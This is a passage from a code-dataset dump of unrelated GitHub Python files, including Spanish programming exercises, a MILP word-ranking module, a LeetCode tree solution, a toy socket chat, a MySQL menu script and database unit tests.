numerador1: \")),int(input(\"Introduzca denominador1: \")),int(input(\"Introduzca numerador2: \")),int(input(\"Introduzca denominador2: \"))))\n elif opcion==\"d\":\n print(dividir_fraccion(int(input(\"Introduzca numerador1: \")),int(input(\"Introduzca denominador1: \")),int(input(\"Introduzca numerador2: \")),int(input(\"Introduzca denominador2: \"))))\n else:\n print(\"\\nIntroduzca una opcion del menu\")\n
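\n# Cross-check sketch (assumption: only the Python standard library is used here;\n# this block is not part of the original exercise). fractions.Fraction reduces to\n# lowest terms, so it can confirm the helpers above, and math.gcd is the library\n# counterpart of maximo_comun_divisor.\nfrom fractions import Fraction\nfrom math import gcd\nassert(sumar_fraccion(1,2,1,3)==(Fraction(1,2)+Fraction(1,3)).as_integer_ratio())\nassert(multiplicar_fraccion(2,3,3,4)==(Fraction(2,3)*Fraction(3,4)).as_integer_ratio())\nassert(gcd(16,6)==maximo_comun_divisor(16,6))\n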
\n\"\"\"Figuras:\n1. Define una función que calcule el área de un círculo dado su radio.\n2. Defina una función que dado el radio de un círculo devuelva su longitud.\n3. Función tal que dadas las coordenadas de dos puntos en el plano devuelve su\ndistancia euclídea. Un punto en el plano tiene dos coordenadas (abscisa y\nordenada), por lo tanto, la entrada a esta función son cuatro valores reales.\n4. Función tal que dadas las coordenadas de un triángulo en el plano, nos devuelve\nsu perímetro.\n5. Haciendo uso de la función anterior diseña otra que calcule su área.\n\"\"\"\n\ndef calcular_area_circulo(radio):\n PI=3.1416\n return f\"{PI*(radio**2):.2f}\"\n\ndef longitud_circulo(radio):\n PI=3.1416\n return f\"{PI*(radio*2):.2f}\"\n\ndef distancia_euclidea(x1,y1,x2,y2):\n return f\"{(((x2-x1)**2)+((y2-y1)**2))**0.5:.2f}\"\n\ndef perimetro_triangulo(x1,y1,x2,y2,x3,y3):\n return f\"{((((x2-x1)**2)+((y2-y1)**2))**0.5)+((((x3-x2)**2)+((y3-y2)**2))**0.5)+((((x3-x1)**2)+((y3-y1)**2))**0.5):.2f}\"\n\n\ndef area_triangulo(x1,y1,x2,y2,x3,y3):\n # Fórmula de Herón: s es el semiperímetro y el área es sqrt(s(s-a)(s-b)(s-c))\n lado1=(((x2-x1)**2)+((y2-y1)**2))**0.5\n lado2=(((x3-x2)**2)+((y3-y2)**2))**0.5\n lado3=(((x3-x1)**2)+((y3-y1)**2))**0.5\n s=(lado1+lado2+lado3)*0.5\n return f\"{(s*(s-lado1)*(s-lado2)*(s-lado3))**0.5:.2f}\"\n\n\n\"\"\"Fechas:\n1. Función que dado un instante (horas, minutos y segundos) devuelva el número\nde segundos transcurridos desde el inicio de un día hasta ese instante.\n2. Crea una función que devuelva la diferencia en segundos entre dos instantes de\ntiempo del mismo día. Recibirá como parámetros seis valores, hora, minuto y\nsegundo de cada uno de los instantes.\n3. Write a Python program to convert seconds to day, hour, minutes and seconds.\n4. Write a Python program to calculate the number of days between two dates.\n5. Write a Python program to print the calendar of a given month and year. If you\nfeel confident enough, extend it to cover a complete year (See annex).\n\"\"\"\n\ndef calcular_segundos(horas,minutos,segundos):\n if horas >= 24 or minutos >= 60 or segundos >= 60:\n print(\"Introduce horario valido\")\n else:\n return ((horas*60)*60)+(minutos*60)+segundos\n\nassert(calcular_segundos(2,0,0)==7200)\n\ndef diferencia_dia(horas1,minutos1,segundos1,horas2,minutos2,segundos2):\n instante1=calcular_segundos(horas1,minutos1,segundos1)\n instante2=calcular_segundos(horas2,minutos2,segundos2)\n return instante1-instante2\n\nassert(diferencia_dia(12,12,12,12,12,12)==0)\nassert(diferencia_dia(13,12,12,12,12,12)==3600)\n\ndef convertidor_horario(segundos):\n\n dias=int((segundos//60)//60)//24\n horas=int((segundos//60)//60)%24\n minutos=int(segundos//60)%60\n segundos=int(segundos)%60\n\n return dias, horas, minutos, segundos\nassert(convertidor_horario(118560)==(1,8,56,0))\n\ndef bisiesto(year):\n if (year %4==0) and (year%100!=0 or year%400==0):\n return True\n else:\n return False\n\ndef dias_pasados(dia,mes,year): #Ejercicio realizado en un boletin anterior\n try:\n meses=1\n meslargo=[1,3,5,7,8,10,12]\n totaldias=0\n totaltranscurrido=0\n if (dia >31 or dia < 1) or (mes>12 or mes<1) or (dia>29 and mes==2) or (dia==29 and mes==2 and bisiesto(year)==False):\n print(\"Introduzca una fecha correcta por favor\")\n totaltranscurrido=False\n else:\n\n if mes==1:\n totaltranscurrido=dia\n elif bisiesto(year)==True:\n while meses < mes:\n if meses==2:\n totaldias+=29\n elif meses in meslargo:\n totaldias+=31\n else:\n totaldias+=30\n meses+=1\n totaltranscurrido=(totaldias)+(dia)\n else:\n while meses < mes:\n if meses==2:\n totaldias+=28\n elif meses in meslargo:\n totaldias+=31\n else:\n totaldias+=30\n meses+=1\n totaltranscurrido=(totaldias)+(dia)\n\n except:\n print(\"Introduzca valores en formato dd-mm-yyyy\")\n return totaltranscurrido\n
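\n# Verification sketch (assumption: the datetime module is fair game here, even\n# though the exercise asks for a manual implementation). date.toordinal() and\n# timetuple().tm_yday give exact day counts to check the functions above against.\nfrom datetime import date\nassert(dias_pasados(24,2,2002)==date(2002,2,24).timetuple().tm_yday)\nassert(abs(date(2002,2,24).toordinal()-date(2002,2,20).toordinal())==4)\n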
\ndef dias_entre_fechas(dia1,mes1,year1,dia2,mes2,year2):\n # aproximación: cuenta 365 días por año y no corrige los bisiestos intermedios\n years=0\n if year1!=year2:\n years=abs(year1-year2)*365\n return abs(dias_pasados(dia1,mes1,year1)-dias_pasados(dia2,mes2,year2))+years\n\nassert(dias_entre_fechas(24,2,2002,20,2,2002)==4)\n\ndef getDayOfWeek(day,month,year):\n dayinweek={0:\"Domingo\",1:\"Lunes\",2:\"Martes\",3:\"Miercoles\",4:\"Jueves\",5:\"Viernes\",6:\"Sabado\"}\n d=None\n try:\n if month<1 or year<1:\n print(\"Introduzca valores validos\")\n else:\n a = (14 - month)//12\n y = year - a\n m = month + 12 * a - 2\n d= int(((day + y + y//4 - y//100 + y//400 + (31*m)//12)%7))\n d=dayinweek[d]\n except:\n print(\"Valores invalidos\")\n return d\n\ndef calendar(month,year):\n # construye el mes como texto, de lunes a domingo, sin enumerar cada caso\n dias_mes=[31,28,31,30,31,30,31,31,30,31,30,31]\n total=dias_mes[month-1]\n if month==2 and bisiesto(year):\n total=29\n semana=[\"Lunes\",\"Martes\",\"Miercoles\",\"Jueves\",\"Viernes\",\"Sabado\",\"Domingo\"]\n hueco=semana.index(getDayOfWeek(1,month,year))\n calendario=\"\\n L  M  X  J  V  S  D\\n\"+\"   \"*hueco\n for dia in range(1,total+1):\n calendario+=f\"{dia:2d} \"\n if (dia+hueco)%7==0:\n calendario+=\"\\n\"\n return calendario\n\n\nprint(calendar(3,2001))\n","repo_name":"W3irdev/Python","sub_path":"programacionModular/Boletin4.py","file_name":"Boletin4.py","file_ext":"py","file_size_in_byte":24509,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19117671734","text":"############################################################\n# Module : Bansal paper milp\n# Date : December 10th\n# Author : Xiao Ling\n############################################################\n\nfrom pulp import *\nfrom prelude import * \nfrom utils import *\nfrom server import * \nfrom client import * \nfrom app import * \nfrom nltk.corpus import wordnet as wn\n\n\n############################################################\n# All\n\n
def milp(app):\n\n two = app.TwoSided\n ranking = [milp_no_syn(gold,app) for _,_,gold in two.test()]\n\n taus = [r['tau'] for r in ranking]\n taus2 = [r['tau-notie'] for r in ranking]\n taus_max = [r['tau-max'] for r in ranking]\n taus2_max = [r['tau-notie-max'] for r in ranking]\n pairs = [r['pairwise'] for r in ranking]\n\n avg_tau = sum(taus) / sum(taus_max)\n avg_abs_tau = sum(abs(t) for t in taus) / sum(abs(t) for t in taus_max)\n avg_tau2 = sum(taus2) / sum(taus2_max)\n avg_abs_tau2 = sum(abs(t) for t in taus2) / sum(abs(t) for t in taus2_max)\n avg_pair = sum(pairs) / len(pairs)\n\n\n avg_tau_max = sum(taus_max) / len(taus_max)\n avg_abs_tau_max = sum(abs(t) for t in taus_max) / len(taus_max)\n avg_tau2_max = sum(taus2_max) / len(taus_max)\n avg_abs_tau2_max = sum(abs(t) for t in taus2_max) / len(taus_max)\n\n return {'ranking' : ranking\n ,'pattern' : two.pattern()\n ,'average' : {'tau' : avg_tau\n ,'tau-notie' : avg_tau2\n ,'absolute-tau' : avg_abs_tau\n ,'absolute-tau-no-tie' : avg_abs_tau2\n ,'pair-wise' : avg_pair \n # \n ,'regret-tau' : avg_tau_max\n ,'regret-|tau|' : avg_abs_tau_max\n ,'regret-tau-no-tie' : avg_tau2_max\n ,'regret-|tau|-no-tie' : avg_abs_tau2_max\n } \n }\n\n############################################################\n# rank each cluster\n\n'''\n @Use: Given gold standard and server,\n output algo ranking\n no synonyms considered\n'''\ndef milp_no_syn(gold, app):\n\n print ('ranking words ' + str(gold))\n\n words = join(gold)\n\n for k in range(0,10): shuffle(words)\n\n pairs = [u + '=' + v for u in words for v in words if u != v]\n (scores,C) = to_score(pairs,app)\n\n no_data = all(v == 0 for v in [scores[k] for k in scores])\n\n\n '''\n If absolutely no data for any pairs of words, output ties\n If there is any data at all, run Bansal's method\n '''\n if no_data: algo = [words]\n else : algo = bansal_milp(words,pairs,scores,C)\n\n return {'gold' : gold\n ,'algo' : algo\n ,'tau' : tau (gold,algo)\n ,'tau-max' : tau (gold,gold) # need this since max tau not necessarily 1.0\n ,'tau-notie' : tau2(gold,algo)\n ,'tau-notie-max' : tau2(gold,gold)\n ,'pairwise' : pairwise_accuracy(gold,algo)\n ,'raw-score' : scores\n ,'raw-stat' : dict()}\n\n'''\n Bansal's MILP method\n'''\ndef bansal_milp(words,pairs,scores,C):\n\n '''\n initialize problem\n ''' \n prob = LpProblem('-'.join(words), LpMaximize)\n\n '''\n initialize variables\n ''' \n x = dict() # real value of each x_i on [0,1]\n d = dict() # real value of distance between every x_i, x_j, i != j\n w = dict() # integral value where w_ij => i < j\n s = dict() # integral value where s_ij => i > j\n\n for uv in pairs:\n w[uv] = LpVariable('w_' + uv, 0, 1, LpInteger )\n s[uv] = LpVariable('s_' + uv, 0, 1, LpInteger )\n d[uv] = LpVariable('d_' + uv, -1, 1, LpContinuous)\n\n for u in words:\n x[u] = LpVariable('x_' + u, 0, 1, LpContinuous) \n\n\n '''\n objective function\n '''\n objective = [ (w[ij] - s[ij]) * scores[ij] \\\n for ij in pairs ]\n\n prob += lpSum(objective)\n\n '''\n constraints\n '''\n # d_ij = x_j - x_i\n for ij in pairs:\n [i,j] = ij.split('=')\n prob += x[j] - x[i] == d[ij]\n\n # d_ij - w_ij * C <= 0\n for ij in pairs:\n prob += d[ij] - w[ij] * C <= 0\n\n # d_ij + (1 - w_ij) * C >= 0\n for ij in pairs:\n prob += d[ij] + (1 - w[ij]) * C >= 0\n\n # d_ij + s_ij * C >= 0\n for ij in pairs:\n prob += d[ij] + s[ij] * C >= 0\n\n # d_ij - (1 - s_ij) * C <= 0\n for ij in pairs:\n prob += d[ij] - (1 - s[ij]) * C <= 0\n\n '''\n solve and interpret data\n '''\n\n prob.solve()\n\n algo = prob_to_algo_rank(prob,words)\n\n return algo\n
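\n# Toy illustration (assumption: not part of the pipeline; it only reuses the pulp\n# import at the top of this module). It isolates the big-M pattern used above:\n# maximising w forces d = x_v - x_u to stay non-negative, so w acts as the\n# indicator \"u is placed before v\".\ndef big_m_demo():\n C = 10.0\n prob = LpProblem('big_m_demo', LpMaximize)\n x_u = LpVariable('x_u', 0, 1, LpContinuous)\n x_v = LpVariable('x_v', 0, 1, LpContinuous)\n d = LpVariable('d', -1, 1, LpContinuous)\n w = LpVariable('w', 0, 1, LpInteger)\n prob += w # objective: prefer w = 1\n prob += x_v - x_u == d\n prob += d - w * C <= 0 # w = 0 forces d <= 0\n prob += d + (1 - w) * C >= 0 # w = 1 forces d >= 0\n prob.solve()\n return (w.varValue, d.varValue, x_u.varValue, x_v.varValue)\n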
\n\n############################################################\n# scores\n\ndef is_synonym(u,v):\n u_syns = join([x.lemma_names() for x in wn.synsets(u)])\n v_syns = join([x.lemma_names() for x in wn.synsets(v)])\n return u in v_syns or v in u_syns\n\n\n'''\n @Use: given list of form ['word1=word2', ...]\n output dictionary mapping 'word1=word2' to\n their score, and the normalization constant\n\n to_score :: [String] -> App -> (Dict String Float, Float)\n'''\ndef to_score(pairs,app):\n\n one = app.OneSided\n two = app.TwoSided\n scores = dict()\n\n # compute scores\n for uv in pairs:\n\n [u,v] = uv.split('=')\n s = paper_score(u,v,two)\n scores[uv] = s \n\n\n rescale = [abs(scores[uv]) for uv in scores \\\n if abs(scores[uv]) != 0]\n \n if rescale: rescale = min(rescale)\n else: rescale = 1.0\n\n # normalize scores\n for uv,s in scores.items(): scores[uv] = s/rescale\n\n C = sum(abs(scores[uv]) for uv in scores) * 1000\n\n return (scores, C)\n\n# paper score\ndef paper_score(ai,ak,two):\n w1 = W1(two,ai,ak)\n w2 = W2(two,ai,ak)\n s1 = S1(two,ai,ak)\n s2 = S2(two,ai,ak)\n d = two.data(ai,ak)\n nai = d[ai] + 1\n nak = d[ak] + 1\n\n return ((w1 - s1) - (w2 - s2))/(nai * nak)\n\ndef W1(two,ai,ak):\n P_ws = sum(n for _,n in two.data(ai,ak)['weak-strong']) + 1e-10\n P1 = two.norm()['weak-strong'] + 1e-10\n return P_ws/P1\n\ndef S1(two,ai,ak):\n P_sw = sum(n for _,n in two.data(ai,ak)['strong-weak']) + 1e-10\n P2 = two.norm()['strong-weak'] + 1e-10\n return P_sw/P2\n\ndef W2(two,ai,ak):\n return W1(two,ak,ai)\n\ndef S2(two,ai,ak):\n return S1(two,ak,ai)\n\n\n\n\n\ndef milp_syn(gold,app):\n words = join(gold)\n pairs = [u + '=' + v for u in words for v in words if u != v]\n (scores,C) = to_score(pairs,app)\n\n # build synonym set\n synonyms = [(u,v) for [u,v] in [x.split('=') for x in pairs] \\\n if is_synonym(u,v)]\n '''\n initialize problem\n ''' \n prob = LpProblem('-'.join(words), LpMaximize)\n\n\n '''\n initialize variables\n ''' \n x = dict() # real value of each x_i on [0,1]\n d = dict() # real value of distance between every x_i, x_j, i != j\n w = dict() # integral value where w_ij => i < j\n s = dict() # integral value where s_ij => i > j\n\n for uv in pairs:\n w[uv] = LpVariable('w_' + uv, 0, 1, LpInteger )\n s[uv] = LpVariable('s_' + uv, 0, 1, LpInteger )\n d[uv] = LpVariable('d_' + uv, -1, 1, LpContinuous)\n\n for u in words:\n x[u] = LpVariable('x_' + u, 0, 1, LpContinuous) \n\n '''\n non-synonym and synonym pairs\n ''' \n\n syn_pairs = [u + '=' + v for u,v in synonyms]\n non_syn_pairs = [uv for uv in pairs if uv not in syn_pairs]\n\n print ('=== ', syn_pairs) \n\n\n '''\n objective function\n '''\n objective = [ (w[ij] - s[ij]) * scores[ij] \\\n for ij in non_syn_pairs ] \\\n + [ -1 * C * (w[ij] + s[ij]) for ij in syn_pairs]\n\n prob += lpSum(objective)\n\n\n '''\n constraints\n '''\n # d_ij = x_j - x_i\n for ij in pairs:\n [i,j] = ij.split('=')\n prob += x[j] - x[i] == d[ij]\n\n # d_ij - w_ij * C <= 0\n for ij in pairs:\n prob += d[ij] - w[ij] * C <= 0\n\n # d_ij + (1 - w_ij) * C >= 0\n for ij in pairs:\n prob += d[ij] + (1 - w[ij]) * C >= 0\n\n # d_ij + s_ij * C >= 0\n for ij in pairs:\n prob += d[ij] + s[ij] * C >= 0\n\n # d_ij - (1 - s_ij) * C <= 0\n for ij in pairs:\n prob += d[ij] - (1 - s[ij]) * C <= 0\n\n\n '''\n solve and interpret data\n ''' \n\n prob.solve()\n\n\n algo = prob_to_algo_rank(prob,words)\n\n return {'gold' : gold\n ,'algo' : algo\n ,'tau' : tau (gold,algo)\n ,'tau-max' : tau (gold,gold) # need this since max tau not necessarily 1.0\n ,'tau-notie' : tau2(gold,algo)\n ,'tau-notie-max' : tau2(gold,gold)\n ,'pairwise' : pairwise_accuracy(gold,algo)\n ,'raw-score' : 
scores\n ,'raw-stat' : dict()\n }\n\n\n\n\n\n\n\n","repo_name":"lingxiao/good-great-ngrams","sub_path":"client/milp.py","file_name":"milp.py","file_ext":"py","file_size_in_byte":8529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72610814121","text":"#Java递归代码实现\n# /**\n# * Definition for a binary tree node.\n# * public class TreeNode {\n# * int val;\n# * TreeNode left;\n# * TreeNode right;\n# * TreeNode(int x) { val = x; }\n# * }\n# */\n# class Solution {\n# public boolean isSameTree(TreeNode p, TreeNode q) {\n# return check(p, q);\n# }\n# public boolean check(TreeNode p, TreeNode q){\n# if (p == null && q==null) return true;\n# if(p==null || q==null) return false;\n# if (p.val != q.val) return false;\n# return check( p.left, q.left) && check(p.right, q.right);\n# }\n\n# }\n#python代码非递归实现\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def isSameTree(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n nodequeue= []\n nodequeue.append(p)\n nodequeue.append(q)\n while (nodequeue):\n next1 = nodequeue.pop(0)\n next2 = nodequeue.pop(0) \n if not next1 and not next2:\n continue\n if not next1 or not next2:\n return False\n if next1.val != next2.val:\n return False\n nodequeue.append(next1.left)\n nodequeue.append(next2.left) \n nodequeue.append(next1.right) \n nodequeue.append(next2.right)\n return True\n","repo_name":"ayang818/LeetCode","sub_path":"easy/leetcode100.py","file_name":"leetcode100.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9347153260","text":"import socket\nfrom threading import Thread\nfrom utils import (obtain_data,\n send_data,\n print_data,)\n\n\nif __name__ == '__main__':\n with socket.socket() as s:\n s.bind(('0.0.0.0', 666))\n s.listen(1)\n connection, ip = s.accept()\n print('ip:{} 已连接'.format(ip))\n t = Thread(target=print_data, args=(connection,))\n t.start()\n while True:\n data = input('')\n if data == '_!exit':\n break\n send_data(data, connection)\n connection.close()\n","repo_name":"KomorebiL/socket-toy","sub_path":"Instant Messenger/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37669216208","text":"import argparse\nimport json\nfrom src.train import train\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--config', type=str, help='path to config file')\nparser.add_argument('--mode', type=str, help='[train/eval/encode]')\nparser.add_argument('--inputs', type=str, help='for \"encode\" mode')\n\n\nargs = parser.parse_args()\n\nwith open(args.config, 'r') as f:\n cfg = json.load(f)\n\nif args.mode == 'train':\n train(cfg)","repo_name":"sebastiani/vae_experiments","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37852362340","text":"\"\"\".\"\"\"\n\nfrom django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^homepage$', views.home), # These endpoints must be different than in-app url\n url(r'^my_info$', views.my_info),\n url(r'^my_shifts$', views.my_shifts),\n url(r'^shifts_exchange$', views.shifts_exchange),\n url(r'^faqBDM$', views.faqBDM),\n url(r'^no_content$', views.no_content),\n url(r'^get_shifts_history$', views.get_shifts_history),\n url(r'^offer_extra_shift$', views.offer_extra_shift),\n url(r'^.*', views.index) # Urls unknown from the server will redirect to index\n]\n","repo_name":"emillumine/third-party","sub_path":"members_space/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21546378491","text":"import gcj\n\nclass Solver(gcj.Solver):\n def _solve_one(self):\n line=self._getstringline()\n a=len(line)*[1]\n first=True\n for letter in \"welcome to code jam\":\n sum = 0\n if first:\n first = False\n prev = 1\n else:\n prev = 0\n for pos,line_let in enumerate(line):\n if letter==line_let:\n sum+=prev\n prev=a[pos]\n a[pos]=sum%10000\n return \"%04d\" % a[-1]\n","repo_name":"dusek/gcj","sub_path":"problems/2009/round0/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19281681034","text":"# Assignments\n# Assignment 1 - Append .Jr. to the current full_name variable which will result in Erling Haaland Jr.\n#%%\nfirst_name = \"Erling\"\nlast_name = \"Haaland\"\n\nfull_name = first_name + last_name\nprint(full_name)\n\n#%% a. (using the '+' operator)\nfirst_name + \" \" + last_name + \" .Jr\"\n\n# %% b. (using an f-string)\nf\"{first_name} {last_name} .Jr\"\n\n# Assignment 2 - replace the first name of Erling Haaland (Erling) to only the abbreviation of his first hame. This should result in: E. Haaland Jr.\n# %%\nfirst_letter = first_name[0]\nf\"{first_letter}. {last_name} .Jr\"\n\n# Assignment 3 - Create a variable called nationality with the value \"Norway\". Use this variable to create the string (sentence) \"E. Haaland .Jr - Nationality: Norway\". Print out the sentence.\n# %%\nname_abbrv = f\"{first_letter}. 
{last_name} .Jr\"\nnationality = \"Norway\"\nsentence = f\"{name_abbrv} - Nationality: {nationality}\"\nsentence\n# %%\n","repo_name":"ArieTwigt/python_fundamentals_2023_06_01","sub_path":"assignments_2.py","file_name":"assignments_2.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70409373481","text":"import pymysql\n\n\nclass GetData(object):\n\n def __init__(self):\n self.connect = pymysql.connect(host =\"localhost\", user=\"root\", password=\"a12345\",\n database=\"jingdong\", charset=\"utf8\")\n self.cursor = self.connect.cursor()\n\n def __del__(self):\n\n self.cursor.close()\n self.connect.cursor()\n\n def execute_sql(self, sql_command):\n\n self.cursor.execute(sql_command)\n for item in self.cursor.fetchall():\n print(item)\n\n def show_all_items(self):\n\n sql_command = \"select * from goods;\"\n self.execute_sql(sql_command)\n\n def show_cates(self):\n\n sql_command = \"select name from goods_cates;\"\n self.execute_sql(sql_command)\n\n def show_brands(self):\n\n sql_command = \"select name from goods_brands;\"\n self.execute_sql(sql_command)\n\n def add_cates(self):\n item_name = str(input(\"输入新商品分类的名称:\"))\n sql_command = \"insert into goods_cates (name) values ('{}');\".format(item_name)\n self.cursor.execute(sql_command)\n # self.connect.rollback() 在执行 cursor.execute 时如果出现了错误,可以用这个命令进行回滚,但是主键不会回滚\n self.connect.commit() # 增删改都要添加这一句,目的是使数据写入数据表中\n\n @staticmethod\n def print_menu():\n\n print(\"请选择你要查询的信息\")\n print(\"---------------------------\")\n print(\"1. 查询所有商品信息\")\n print(\"2. 查询所有商品分类\")\n print(\"3. 查询所有商品品牌分类\")\n print(\"4. 添加一个商品分类\")\n return input(\"请输入:\")\n\n def run(self):\n\n while True:\n choose = self.print_menu()\n if choose == \"1\":\n self.show_all_items()\n\n if choose == \"2\":\n self.show_cates()\n\n if choose == \"3\":\n self.show_brands()\n\n if choose == \"4\":\n self.add_cates()\n\n if choose == \"q\" or choose == \"0\":\n exit()\n\n\ndef main():\n jd = GetData()\n jd.run()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"RyanLin1995/python","sub_path":"python_improve/05_MYSQL数据库/02_添加一个商品分类.py","file_name":"02_添加一个商品分类.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30061753717","text":"from typing import Optional, List\nfrom queue import Queue\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def averageOfLevels(self, root: Optional[TreeNode]) -> List[float]:\n q = Queue()\n result = []\n q.put(root)\n\n while not q.empty():\n count = q.qsize()\n sum = 0\n tmp = count\n while tmp:\n curr = q.get()\n sum += curr.val\n\n if curr.left != None:\n q.put(curr.left)\n\n if curr.right != None:\n q.put(curr.right)\n tmp -= 1\n\n result.append(sum / count)\n\n return result\n\n\nsol = Solution()\n\nroot = TreeNode(3)\nroot.left = TreeNode(9)\nroot.right = TreeNode(20)\nroot.right.left = TreeNode(15)\nroot.right.right = TreeNode(7)\nprint(sol.averageOfLevels(root))\n","repo_name":"abhishekxix/algorithms","sub_path":"problems/average-of-levels-bst.py","file_name":"average-of-levels-bst.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3272840051","text":"import torch\nfrom bench.core.executer import Executer\n\n\ndef meshgrid(x, 
y, row_major=True):\n xx = x.repeat(len(y))\n yy = y.view(-1, 1).repeat(1, len(x)).view(-1)\n if row_major:\n return xx, yy\n else:\n return yy, xx\n\n\ndef grid_anchors(base_anchors, featmap_size, stride, device=\"cuda\"):\n\n feat_h, feat_w = featmap_size\n shift_x = torch.arange(0, feat_w, device=device) * stride\n shift_y = torch.arange(0, feat_h, device=device) * stride\n shift_xx, shift_yy = meshgrid(shift_x, shift_y)\n shifts = torch.stack([shift_xx, shift_yy, shift_xx, shift_yy], dim=-1)\n shifts = shifts.type_as(base_anchors)\n\n all_anchors = base_anchors[None, :, :] + shifts[:, None, :]\n all_anchors = all_anchors.view(-1, 4)\n return all_anchors\n\n\ndef args_adaptor(np_args):\n base_anchors = torch.from_numpy(np_args[0]).cuda()\n\n return [base_anchors, np_args[1], np_args[2]]\n\n\ndef executer_creator():\n return Executer(grid_anchors, args_adaptor)\n","repo_name":"DeepLink-org/DLOP-Bench","sub_path":"bench/samples/long_tail/grid_anchors/torch_impl.py","file_name":"torch_impl.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"18"} +{"seq_id":"32207666652","text":"import os\nimport json\nimport tempfile\nfrom unittest import TestCase\n\nfrom table_minion import web, db\nfrom table_minion.games import Game, Games\nfrom table_minion.players import Player, Players\nfrom table_minion.game_tables import GameTable, GameTables\n\n\nPLAYER_WITH_REG_QUERY = '''\nSELECT name, team, slot, registration_type\nFROM players AS p LEFT JOIN player_registrations AS pr ON p.id=pr.player\nORDER BY p.id, slot;\n'''\n\nGAME_QUERY = '''\nSELECT slot, name, author, system, blurb, min_players, max_players FROM games;\n'''\n\n\nclass TestDB(TestCase):\n def setUp(self):\n self.db_fd, web.app.config['DATABASE'] = tempfile.mkstemp()\n web.app.config['TESTING'] = True\n self.client = web.app.test_client()\n db.init_db(web.app)\n self.rctx = web.app.test_request_context()\n self.rctx.push()\n db.open_db(web.app)\n\n def tearDown(self):\n db.close_db()\n self.rctx.pop()\n os.close(self.db_fd)\n os.unlink(web.app.config['DATABASE'])\n\n def assert_query(self, expected, query, args=()):\n rows = db.query_db(query, args)\n self.assertEqual(expected, map(tuple, rows))\n # row_dicts, [dict(zip(row.keys(), row)) for row in rows])\n\n def test_init_db(self):\n db.query_db('INSERT INTO players (name) VALUES (\"foo\");')\n db.commit_db()\n self.assertNotEqual([], db.query_db('SELECT * FROM players;'))\n\n db.init_db(web.app)\n self.assertNotEqual([], db.query_db('SELECT * FROM players;'))\n\n db.init_db(web.app, clear=True)\n self.assertEqual([], db.query_db('SELECT * FROM players;'))\n\n def test_insert_player(self):\n self.assert_query([], 'SELECT * FROM players;')\n self.assert_query([], 'SELECT * FROM player_registrations;')\n db.insert_player(Player('Gary Gygax', 'TSR', {'1A': 'G'}))\n self.assert_query(\n [('Gary Gygax', 'TSR', '1A', 'G')], PLAYER_WITH_REG_QUERY)\n\n def test_import_players(self):\n db.query_db('INSERT INTO players (name) VALUES (\"foo\");')\n db.commit_db()\n self.assert_query([('foo', None, None, None)], PLAYER_WITH_REG_QUERY)\n\n db.import_players(Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1B': 'P'}),\n ]))\n self.assert_query([\n ('Gary Gygax', 'TSR', '1A', 'G'),\n ('Dave Arneson', None, '1B', 'P'),\n ], PLAYER_WITH_REG_QUERY)\n\n def test_get_players(self):\n self.assertEqual([], list(db.get_players()))\n db.import_players(Players([\n Player('Gary Gygax', 
'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1B': 'P'}),\n ]))\n players = db.get_players()\n self.assertTrue(isinstance(players, Players))\n self.assertEqual(list(players), [\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1B': 'P'}),\n ])\n\n def test_get_players_for_game(self):\n db.import_players(Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P', '2A': 'X'}),\n Player('Jane Bloggs', None, {'2A': 'P'}),\n ]))\n players = db.get_players_for_game('1A')\n self.assertTrue(isinstance(players, Players))\n self.assertEqual(list(players), [\n Player('Gary Gygax', 'TSR', {'1A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P'}),\n ])\n\n def test_get_player(self):\n db.import_players(Players([\n Player('Gary Gygax', 'TSR', {'1A': 'G', '2A': 'G'}),\n Player('Dave Arneson', None, {'1A': 'P'}),\n ]))\n self.assertRaises(db.NotFound, db.get_player, 'foo')\n self.assertEqual(\n db.get_player('Gary Gygax'),\n Player('Gary Gygax', 'TSR', {'1A': 'G', '2A': 'G'}))\n\n def test_insert_game(self):\n self.assert_query([], 'SELECT * FROM games;')\n db.insert_game(Game(\n '1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 6))\n self.assert_query(\n [('1A', 'Game 1A', 'Author 1A', 'System 1A', 'Blurb 1A', 4, 